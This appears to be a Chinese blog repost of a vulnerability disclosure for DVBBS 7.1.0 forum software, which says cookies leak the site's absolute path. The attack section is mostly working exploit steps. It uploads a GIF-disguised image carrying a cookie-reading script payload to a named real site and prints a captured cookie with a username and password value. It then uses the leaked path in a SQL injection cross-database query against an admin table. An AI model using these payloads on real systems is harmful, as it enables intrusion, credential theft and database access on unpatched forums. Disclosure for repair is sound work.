dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复!
dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
gif89a
[code]<script>
alert(document.cookie)
</script>[/code]
抓包得到cookie如下
cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs=
分析cookie可以得到站点的绝对路径如下:
d://web//dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com//linzi.asp?****=you
论谈为dvbbs 7.1.0 ,数据库为datadvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d://www//dvbbs//data//dvbbs.asp
实现跨库查询如下:
www.host.com//linzi.asp?****=you and (select count(*) from dv_admin in "d://www//dvbbs//data//dvbbs.asp")
官方补丁:
尚无
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值